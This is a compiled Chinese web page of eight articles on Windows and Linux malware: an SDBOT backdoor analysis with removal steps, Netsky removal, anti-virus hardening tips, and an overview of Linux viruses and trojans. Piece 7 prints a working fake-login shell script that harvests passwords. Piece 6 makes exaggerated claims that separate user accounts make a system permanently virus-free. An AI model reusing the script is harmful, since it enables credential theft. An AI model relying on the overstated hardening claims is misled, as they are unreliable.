我国发现“斯伯特”（BackdoorSDBOT）病毒变种Windows系统

时间：2022-09-11 08:09:54 其他范文收藏本文下载本文

下面是小编为大家收集的我国发现“斯伯特”（BackdoorSDBOT）病毒变种Windows系统，本文共8篇，仅供参考，欢迎大家阅读，一起分享。

篇1：我国发现“斯伯特”（BackdoorSDBOT）病毒变种Windows系统

国家计算机病毒应急处理中心于4月5日接到用户报告，该部门遭受病毒感染，造成局域网瘫痪，并发送大量的SYN包，经证实是感染了“斯伯特”（Backdoor_SDBOT）病毒的最新变种。病毒运行后在系统文件夹下生成病毒文件，修改注册表。病毒还通过网络共享

国家计算机病毒应急处理中心于204月5日接到用户报告，该部门遭受病毒感染，造成局域网瘫痪，并发送大量的SYN包。经证实是感染了“斯伯特”（Backdoor_SDBOT）病毒的最新变种。

病毒运行后在系统文件夹下生成病毒文件，修改注册表。病毒还通过网络共享进行传播，并允许远程用户的访问。另外，病毒还进行SYN洪水攻击。被感染的用户也都使用了弱口令，给病毒可乘之机。

国家计算机病毒应急处理中心在这里提醒广大用户，立即升级杀毒软件和个人防火墙，并启动“实时监控”功能，同时将口令设置的较为复杂，做好病毒的防范工作。

有关该病毒分析报告如下：

病毒名称：“斯伯特”（Backdoor_SDBOT）

病毒类型：后门程序

病毒长度：107,740字节

影响系统：Win 95/98/NT//Me/XP

病毒特征：

1、生成病毒文件

病毒运行后会在系统中生成如下文件:

%System%WIMMTRE.EXE

（其中，%System%在Windows95/98/Me 下为C:WindowsSystem，在Windows NT/2000下为C:WinntSystem32，在Windows XP下为 C:WindowsSystem32）

2、修改注册表

病毒添加注册表项，使得自身能够在系统启动时自动运行，在

HKEY_LOCAL_MACHINESoftwareMicrosoftWindows CurrentVersionRun中添加

Module WinMeter = “wimmtre.exe”

HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run中添加

Module WinMeter = “wimmtre.exe”

HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>RunServices 中添加

Module WinMeter = “wimmtre.exe”

3、删除共享

病毒试图删除以下共享

IPC$

ADMIN$

4、通过网络共享传播

病毒可以通过网络共享进行传播，它会在下列路径生成病毒文件：

IPC$wimmtre.exe

D$wimmtre.exe

print$wimmtre.exe

c$wimmtre.exe

Admin$wimmtre.exe

c$windowssystem32wimmtre.exe

c$winntsystem32wimmtre.exe

Admin$system32wimmtre.exe

5、后门功能

病毒允许远程用户访问被感染机器的文件和其它系统资源，同时还可以进行弱口令攻击，是系统安全受到威胁，

另外，病毒还进行SYN洪水攻击。

清除该病毒的一些建议：

1、终止病毒进程

在Windows 9x/ME系统，同时按下CTRL+ALT+DELETE，在Windows NT/2000/XP系统中，同时按下CTRL+SHIFT+ESC，选择“任务管理器――〉进程”，选中正在运行的病毒进程，并终止其运行。

2、注册表的恢复

点击“开始――〉运行”，输入regedit,运行注册表编辑器，依次双击左侧的HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>Run

HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run

HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>RunServices

并删除面板右侧的Module WinMeter = “wimmtre.exe”

3、删除病毒释放的文件

点击“开始――〉查找――〉文件和文件夹”，查找文件“wimmtre.exe”，并将找到的文件删除。

4、运行杀毒软件，对系统进行全面的病毒查杀

5、修改弱口令，请用户将口令设置的较为复杂，减少被攻破的可能性

原文转自：www.ltesting.net

篇2：Windows系统防范病毒

安插陷阱布下埋伏

如果大家使用的是Win2000/XP/操作系统的话，那么你可以尝试一下以下的方法――从源头上让你的系统可以对病毒免疫。

第一步：首先全新安装的操作系统(或者你能确认你当前使用的系统是无毒的)，立即就打开： “开始→程序→管理工具→计算机管理→本地用户和组→用户”，把超级管理员密码更改成十位数以上，并且尽量使用数字和大小写字母相结合的密码。

计算机管理器

第二步：建立一个用户，把它的密码也设置成十位以上并且提升为超级管理员。

这样做的目的是为了双保险：如果你忘记了其中一个密码，还有使用另一个超管密码登录来挽回的余地，免得你被拒绝于系统之外;再者就是网上的无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏，

第三步：再添加两个用户，比如用户名分别为：nyh1、nyh2;并且指定他们属于user组，好了，准备工作到这里就全部完成了，以后你除了必要的维护计算机外就不要使用超级管理员和nyh2登录了。只使用nyh1登录就可以了。

小提示：建立新用户时，默认为user组。如果要建立管理员用户，在新建完用户后，在“组”里面，点选Administrators组，点击“添加”把这个账号加入Administrators组中。

伪装傀儡欺骗攻击者

有了陷阱，该怎么用呢?我们继续，登录之后上网的时候找到IE，并为它建立一个快捷方式到桌面上，右键单击快捷方式，选择“以其他用户方式运行”点确定!要上网的时候就点这个快捷方式，它会跟你要用户名和密码这时候你就输入nyh2的用户名和密码!

好了，现在你可以使用这个打开的窗口去上网了，可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页，而不必再担心中招了!

小提示：不要使用nyh2来登录系统，因为如果那样的话，如果nyh2以前中过什么网页病毒，那么在user2登录的同时，他们极有可能被激活!

下面是建立IE快捷方式的步骤：

在桌面上点击右键，选择“新建→快捷方式”，在弹出的窗口中选择Iexplore(位置在“C:Program FilesInternet ExplorerIexplore.exe”)，点击“下一步”完成。然后鼠标右键点击该快捷方式，选择“属性”，再点击“高级按钮”，在以“其他用户身份运行”前打上钩。

篇3：三招手工必杀小邮差变种诺维格病毒Windows系统

第一步：终止恶意程序打开 windows 任务管理器，在windows95/98/ME系统中, 按CTRL+ALT+DELETE；在Windows NT// XP 系统中, 按CTRL+SHIFT+ESC, 然后点击进程选项卡；在运行程序列表中, 找到进程: taskmon.exe ；选择恶意程序进程, 然后点击结束任务或

第一步：终止恶意程序

打开windows任务管理器，在windows95/98/ME系统中, 按CTRL+ALT+DELETE；

在Windows NT/2000/XP系统中, 按CTRL+SHIFT+ESC, 然后点击进程选项卡；

在运行程序列表中, 找到进程: taskmon.exe ；

选择恶意程序进程, 然后点击结束任务或结束进程按钮（取决于windows的版本）；

为了检查恶意程序是否被终止, 关掉任务管理器, 然后再打开；

关掉任务管理器；

*注意: 在运行windows95/98/ME的系统中, 任务管理器可能不会显示某一进程. 可以使用其他进程查看器来终止恶意程序进程. 否则, 继续处理下面的步骤, 注意附加说明，

第二步：删除注册表中的自启动项目

从注册表中删除自动运行项目来阻止恶意程序在启动时执行；

打开注册表编辑器: 点击开始>运行, 输入REGEDIT, 按Enter；

在左边的面板中, 双击：

HKEY_CURRENT_USER>Software>Microsft>Windows>CurrentVersion>Run

HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>Run

在右边的面板中, 找到并删除如下项目：

TaskMon = %System%taskmon.exe

*注意: %System%是Windows的系统文件夹, 在Windows 95, 98, 和ME系统中通常是 C:WindowsSystem, 在WindowsNT和2000系统中是:WINNTSystem32, 在Windows XP系统中是C:WindowsSystem32.

*注意: 如果不能按照上述步骤终止在内存中运行的恶意进程, 请重启系统，

第三步：删除注册表中的其他恶意项目

如下是删除注册表中其他恶意项目的说明。

仍旧在注册表编辑器中, 在菜单条中点击编辑>查找, 在文本领域中输入“ComDlg32”, 点击查找下一个；

当像如下键值出现时, 删除键值和数据：

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerComDlg32Version

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerComDlg32Version

关闭注册表编辑器.

通过以上三招，烦人的“诺维格”病毒就可以被清除干净了。不过以上方法主要针对电脑专业人士应用比较方便，普通计算机用户请尽量利用杀毒软件查杀此病毒，请及时升级您的杀毒软件到最新。

原文转自：www.ltesting.net

篇4：如何删除计算机Windows系统中病毒

如果计算机感染了病毒，则需要尽快删除病毒，检查是否存在病毒的一种快速方法是使用联机扫描程序，如 Microsoft Safety Scanner。扫描程序是一种免费的联机服务，可帮助您识别和删除病毒、清理硬盘并提高计算机的总体性能。如果您不确定计算机是否感染病毒，请参阅如何判断计算机中是否有病毒？来检查是否存在一些迹象。若要尝试其他在线扫描程序，请按照在 Windows 安全软件提供商网页上提供在线扫描程序的其他公司的链接进行操作。如果您可以连接到 Internet 如果您可以使用 Web 浏览器进入网站，请运行在线扫描。运行 Microsoft Safety Scanner

转到 Microsoft Safety Scanner 网页以下载该扫描程序。

单击“立即下载”，然后按照屏幕上的说明进行操作。如果您无法连接到 Internet 如果您无法使用联机的 Microsoft Safety Scanner，请尝试在启用网络连接的情况下以安全模式重新启动计算机。在启用网络连接的情况下以安全模式重新启动 1.重新启动计算机。 2.在看到计算机制造商的徽标时，按住 F8 键。 3.在“高级启动选项”屏幕上，使用箭头键突出显示“网络安全模式”，然后按 Enter。

4.使用具有管理员权限的用户帐户登录计算机。 5.按照上面的步骤运行 Microsoft Safety Scanner。有关不同启动模式的详细信息，请参阅在安全模式下启动计算机。如果在以安全模式重新启动之后仍无法访问 Internet，请尝试重置 Internet Explorer 代理设置。以下步骤重置 Windows‌ 注册表中的代理设置，以便您可以再次访问 Internet。重置 Internet Explorer 代理设置 1. 在 Windows 7 中，单击“开始”按钮。在搜索框中，键入 run，然后在结果列表中单击“运行”。 -或者- 在 Windows Vista 中，单击“开始”按钮，然后单击“运行”，

-或者- 在 Windows XP 中，单击“开始”，然后单击“运行”。 2.在“运行”对话框的“打开”框中复制并粘贴或键入下面的文本： reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings” /v ProxyEnable /t REG_DWORD /d 0 /f 3.单击“确定”。 4. 在 Windows 7 中，单击“开始”按钮。在搜索框中，键入 run，然后在结果列表中单击“运行”。 -或者- 在 Windows Vista 中，单击“开始”按钮，然后单击“运行”。 -或者- 在 Windows XP 中，单击“开始”，然后单击“运行”。 5.在“运行”对话框的“打开”框中复制并粘贴或键入下面的文本： reg delete “HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings” /v ProxyServer /f 6.单击“确定”。重新启动 Internet Explorer，然后按照前面列出的步骤运行扫描程序。手动删除病毒

有时必须手动删除病毒。这可能是一个技术过程，仅当您熟悉 Windows 注册表而且知道如何在 Windows 中查看和删除系统和程序文件时才应执行该过程。首先，通过运行防病毒程序来根据名称确定病毒。如果您没有防病毒程序，或者您的防病毒程序没有检测到病毒，则仍可以通过查找有关病毒行为的线索来确定病毒。记下防病毒程序所显示的任何消息中的文字，或者如果您是通过电子邮件收到病毒的，请写下该邮件的主题行或者附加到该邮件的文件的名称。然后搜索防病毒供应商的网站，看其中是否引用了您记下的这些内容，并尝试查找该病毒的名称及其删除方式说明。恢复和预防

在删除病毒之后，您可能需要重新安装某个软件，或者还原丢失的信息。对文件进行定期备份可以帮助您避免在计算机再次受到感染时丢失数据。如果您过去未保留备份，则建议您从现在开始这样做。

点击阅读更多学院相关文章>>

分享到

篇5：windows 系统中拒绝恶意代码病毒防范

首先我们认识一下什么是恶意代码？

恶意代码是一种程序，它通过把代码在不被察觉的情况下镶嵌到另一段程序中，从而达到破坏被感染电脑数据、运行具有入侵性或破坏性的程序、破坏被感染电脑数据的安全性和完整性的目的，按传播方式，恶意代码可以分成五类：病毒，木马，蠕虫，移动代码和复合型病毒. 怎么来防护呢？简单的说就是打开一个程序或者网页，例如它是一个QQ木马截取帐号密码，表面上是截取帐号密码，但木马中包含着破坏性功能如以下方法：

第一步：右键我的电脑-资源管理器-工具-文件夹属性-文件类型（找vbs ,vbe ,js ,js,wsf,wsh）

执行删除

第二步：IE右键属性-安全-internet-自定义级别-ActiveX控件自动提示-对标记为可安全执行

脚本的ActiveX控件执行脚本-对没有标记为安全的ActiveX控件进行初始化和脚本运行（选择禁用）

篇6：Windows系统设置让病毒木马不在

大家对病毒都是痛疾若杀，但有时也是无奈，只能靠杀毒软件和防火墙进行简单防护，今天给大家分享的是让病毒一剑穿心。

一、新安装的纯系统

必须是全盘格式化，进行安装的系统，而且是纯净的，不能有点杂草，如果是微软自己种的，那没有办法。

操作“开始→程序→管理工具→计算机管理→本地用户和组→用户”

首先就是把超级管理员密码更改成十位数以上，而且是小写字母，大写字母，数字，特殊符号相混合的。然后再建立一个用户，把它的密码也设置成十位以上并且提升为超级管理员。这样做的目的是为了双保险：如果你忘记了其中一个密码，还有使用另一个超管密码登陆来挽回的余地，免得你被拒绝于系统之外；再者就是网上的无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏。接着再添加两个用户，比如用户名分别为：dayua1、dayua2；并且指定他们属于user组，好了，准备工作到这里就全部完成了，以后你除了必要的维护计算机外就不要使用超级管理员和dayua2登陆了。只使用dayua1登陆就可以了。

登陆之后上网的时候找到IE，并为它建立一个快捷方式到桌面上，右键单击快捷方式，选择“以其他用户方式运行”点确定！要上网的时候就点这个快捷方式，它会跟你要用户名和密码这时候你就输入dayua2的用户名和密码！！！好了，现在你可以使用这个打开的窗口去上网了，可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页，而不必再担心中招了！因为你当前的系统活动的用户时dayua1。而dayua2是不活动的用户，我们使用这个不活动的用户去上网时，无论多聪明的网站，通过IE得到的信息都将让它都将以为这个dayua2就是你当前活动的用户，如果它要在你浏览时用恶意代码对你的系统搞搞破坏的话根本就时行不通的，即使能行通，那么被修改掉的仅仅时dayua2的一个配置文件罢了，而很多恶意代码和病毒试图通过dayua2进行的破坏活动却都将失败，因为dayua2根本就没运行，怎么能取得系统的操作权呢？？既然取不得，也就对你无可奈何了，

而他们更不可能跨越用户来操作，因为微软得配置本来就是各各用户之间是独立的，就象别人不可能跑到我家占据我睡觉用的床一样，它们无法占据dayua1的位置！所以你只要能保证总是以这个dayua2用户做代理来上网（但却不要使用dayua2来登陆系统，因为如果那样的话，如果dayua2以前中过什么网页病毒，那么在dayua2登陆的同时，他们极有可能被激活！），那么无论你中多少网页病毒，全部都将是无法运行或被你当前的dayua1用户加载的，所以你当前的系统将永远无毒！

二、对于已经中标的机器

重新启动计算机，使用超级管理员登陆?D?D进入系统后什么程序都不要运行

你会惊奇的发现在的系统竟然表现的完全无毒！！，那就再好不过了，现在就立即就打开：

“开始→程序→管理工具→计算机管理→本地用户和组→用户”吧！

把里面的dayua1和dayua2两个用户权删掉吧，你只需要这么轻轻的一删就可以了，那么以前随着这两个用户而存在的病毒也就跟随着这两个用户的消失而一起去长眠了?D?D（好象是陪葬，呵呵！）。这么做过之后我保证你的win2k就象新装的一个样，任何系统文件和系统进程里都完全是没有病毒的！

现在再重复开始的步骤从新建立dayua1和dayua2两个用户，让他们复活吧。他们复活是复活了，但是曾跟随了他们的病毒却是没这机会了，因为win2k重新建立用户的时候会重新分配给他们全新的配置，而这个配置是全新的也是不可能包含病毒的！！！建立完成之后立即注销超级管理员，转如使用dayua1登陆，继续你想做的事吧，你会发现你的系统如同全新了！以上方法可以周而复始的用．

篇7：关于Linux下病毒的话题Windows系统

简介通常有四种截然不同类型的威胁，不过用户经常混淆它们，这主要是因为一次攻击的发生往往是各种机制同时作用的结果：病毒自我复制以感染宿主程序体；特洛伊木马执行任务以将之自身隐藏在某个貌似无害的应用程序中；蠕虫利用计算机网络来进行自我

简介

通常有四种截然不同类型的威胁，不过用户经常混淆它们，这主要是因为一次攻击的发生往往是各种机制同时作用的结果：

病毒自我复制以感染宿主程序体；

特洛伊木马执行任务以将之自身隐藏在某个貌似无害的应用程序中；

蠕虫利用计算机网络来进行自我繁殖，例如通过电子邮件；

后门程序允许外部用户使用间接手段掌控某项应用程序，

对它们加以分类通常不那么容易；例如，有些程序在某些观测者看来是病毒，但其它人却认为它们是蠕虫，要做出最终的决策是十分棘手的。不过对于本文所涉及的范围来说，这倒并不很重要，本文意在阐明哪种威胁会危及Linux系统。

与普遍看法正相反的是，这四种祸害其实已经都存在于Linux上了。当然，病毒的传播环境不像在如DOS下那么有利，但现有的威胁亦不容小视。就让我们分析一下有哪些风险。

潜在的威胁

病毒

病毒是一小段安置在某个宿主程序核心位置的代码，它能够通过感染新的执行文件来自我复制。病毒最早出现于70年代，当时的程序员在玩一个叫做“core war”的游戏。这个游戏来自于Bell AT&T laboratories[MARSDEN 00]。其目标是在有限的内存区域里并行运行，小程序能够互相破坏。操作系统没有提供程序内存区域之间的保护，这样就允许相互进攻以消灭对手。为此，有些人使用'0'来“轰炸”最大可能的内存区域，与此同时，其它一些人永远在地址空间中移动，希望覆盖掉对手的代码，有时，他们中的一些会联合起来消灭某个难对付的“敌人”。

实现该游戏的算法被翻译成一门特别为其创建的汇编语言“red code”，它通过绝大多数现有机器上的仿真器来执行。游戏中的乐趣更多源于科学的好奇，就如对the Life of Conway Game，不规则碎片形和遗传算法等的狂热一样。

不过，随着关于core war的文章发表在Scientific American[DEWDNEY 84]上，不可避免的事发生了，有些人开始编写小段的自我复制的代码，这些代码特别针对于软驱启动扇区或者可执行文件。起初是在Apple ][计算机上出现，接下来就到了MacIntosh和PC的计算机上。

MS DOS操作系统成为了病毒繁殖环境的绝佳之选：静态可执行文件有着众所周知的格式，没有内存保护，没有基于文件存取权限的安全设置，广泛地在内存中堆叠使用TSR常驻程序，等等。我们必须还加上一条用户心理状态的因素，他们疯狂地用软盘交换可执行程序甚而毫不考虑文件的来源。

在最简单的模式中，病毒就是一小段代码，它可以在启动一项应用程序时作为附件执行。它将利用这段时间来查找其它尚未感染的可执行文件，将其自身内嵌入这些文件中（要是考虑再周到一些，最好保持原程序不作修改）并退出。一旦启动新的可执行文件时，进程即会重新启动。

得益于大量“利器”的协助，病毒可以自动复制自身。在[LUDWIG 91]和[LUDWIG 93]中，有关于for DOS病毒的详细描述，它们使用诡秘的隐身术以保持领先于当前的杀毒软件：随机加密，代码永久变化等等。你甚至可能遇到使用遗传算法来优化其生存期和繁殖能力的病毒。相关的信息你可以在以下这篇非常著名的文档中找到：[SPAFFORD 94].

而我们必须牢记于心的是计算机病毒已经超越了虚拟生活中试验的主题范围，它可以造成大面积的损害。一小段代码的多重复制本质不过是空间的浪费（磁盘和内存），而病毒则可以此作为支撑――运输工具――来服务于其它更加令人不快的东西：逻辑炸弹，我们将在特洛伊木马中再次谈到它。

特洛伊木马和逻辑炸弹

Timeo Danaos et dona ferentes - 即便当希腊人送礼时，我也惧怕他们。 (Virgile, Aeneid,II, 49)。

被围困的特洛伊人作了一个糟糕的决定，他们将大量被希腊攻击者作为宗教祭品而遗弃的木马雕像放进了城，

真正的突击队就藏在特洛伊木马的侧部，待到他们一旦渗入城内，便利用夜幕掩护从里面攻击城池，这样使得希腊人最终赢得了特洛伊战争的胜利。

著名的“特洛伊木马”常被用作计算机安全领域的专门术语,它表示一个看似无害的应用程序，就如上面提到的病毒一样，传播破坏性的代码逻辑炸弹。

逻辑炸弹是一段恶意伤害的程序，它具备各种迥异的效力：

系统资源的高消耗（内存,硬盘,CPU等等。）；

所有可能文件的快速破坏（覆盖它们以阻止用户找回其内容）；

不时地对一个文件进行秘密侵蚀，以尽可能隐藏得更久；

对系统安全的攻击（执行十分松懈的存取权限，将密码文件发送给一个inte.net地址等等。）；

将该机器作为计算机恐怖行动之用，这些恐怖行动如DDoS(Distributed Denial of Service)之类的都在业已闻名的文章[GIBSON 01]中有提到；

关于磁盘上应用程序注册码的详细清单，并将其发送给软件开发者。

在某些情况下，逻辑炸弹会针对特定的目标系统来编写，以试图窃取其上的机密信息，破坏特殊文件或者盗用用户身份识别去毁损其名誉。同样的炸弹在任何其他类型的系统上则是无害的。

逻辑炸弹也可以试图在物理上破坏其驻留的系统。这种可能性虽然不大，但是确实存在（删除CMOS存储器内容，修改modem闪存内容，打印机、绘图仪、扫描仪的头部毁灭性的移动，硬盘读磁头的加速运转...）

倘若继续按照“炸弹”的比喻描述，我们可以说逻辑炸弹需要来引爆。实际上，就效率而言，特洛伊木马或病毒在首次启动时就执行破坏性的操作是一个不好的策略。在安装了逻辑炸弹之后，最好是等待一会再爆炸。对于病毒传播来说，这可以增加其在其它系统中传播的“机会”；而就特洛伊木马来说，则可以不让用户太容易发现新的应用程序安装与他机器上的异常现象之间的联系。

就像任何害人之举一样，发作机制也是各有不同：安装后延迟十天，删除特定用户帐号（临时删除），键盘和鼠标停止活动30分钟，打印机队列的高负载...无所不缺!最有名的特洛伊木马是屏幕保护程序，尽管今天看来这有点太老套。在诱人的外表下，这些程序能够不受干扰地实施破坏，特别是如果逻辑炸弹恰在一小时之后引爆，那么几乎可以肯定用户此时已经不在计算机前面了。

另一个特洛伊木马的著名例子是下面这个脚本，它显示一个登录/密码（login/password）屏幕，并发送信息给启动程序的人然后退出。若它工作于未使用的终端，该脚本将会俘获下个尝试连接的用户的密码。

clearcase/“ target=”_blank“ >cccccc border=1>

#! /bin/sh clear cat /etc/issue echo -n ”login: “ read login echo -n ”Password: “ stty -echo read passwd stty sane mail $USER <<- fin login: $login passwd: $passwd fin echo ”Login incorrect" sleep 1 logout

原文转自：www.ltesting.net

篇8：“网络天空”变种P(NetSky.P)分析报告Windows系统

病毒信息：病毒名称: Worm.NetSky.P 中文名称: 网络天空变种P 威胁级别: 3A 病毒别名: W32.Netsky.P@mm [Sym ant ec] W32/Netsky.p@MM [McAfee] Win32.Netsky.P [Computer Associates] NetSky.P [F-Secure] W32/Netsky.P.worm [Panda] W32/Netsky-P [Sopho

病毒信息：

病毒名称:Worm.NetSky.P

中文名称:网络天空变种P

威胁级别:3A

病毒别名:W32.Netsky.P@mm [Symantec]

W32/Netsky.p@MM [McAfee]

Win32.Netsky.P [Computer Associates]

NetSky.P [F-Secure]

W32/Netsky.P.worm [Panda]

W32/Netsky-P [Sophos]

WORM_NETSKY.P [Trend]

病毒类型:蠕虫、后门